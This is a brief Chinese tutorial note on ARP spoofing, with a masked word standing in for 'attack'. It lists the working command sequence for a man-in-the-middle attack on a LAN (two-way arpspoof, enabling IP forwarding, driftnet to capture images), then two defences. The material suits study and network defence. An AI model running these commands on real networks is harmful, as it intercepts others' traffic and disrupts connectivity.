1 ARP(Address Resolution Protocol,地址解析協議)是一個位於TCP/IP協議棧中的網絡層,負責將某個IP地址解析成對應的MAC地址。
ARP協議的基本功能就是通過目標設備的IP地址,查詢目標設備的MAC地址,以保證通信的進行。
ARP***的侷限性:
ARP***僅能在以太網(局域網如:機房、內網、公司網絡等)進行無法對外網(互聯網、非本區域內的局域網)進行***。
ARP***就是通過僞造IP地址和MAC地址實現ARP欺騙,能夠在網絡中產生大量的ARP通信量使網絡阻塞,***者只要持續不斷的發出僞造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目,造成網絡中斷或中間人***。
關鍵命令:
arpspoof -i eth0 -t 
172.28.15.31 172.28.15.254
echo 1 > /proc/sys/net/ipv4/ip_forward
driftnet
arpspoof -i eth0 -t 172.28.15.254 172.28.15.31
2 arp反欺騙
方法1:部署專門的ARP***防護系統,檢測發動ARP***的電腦並反擊ARP***行爲
方法2:將局域網電腦進行網關靜態綁定,從而可以有效防止ARP斷網***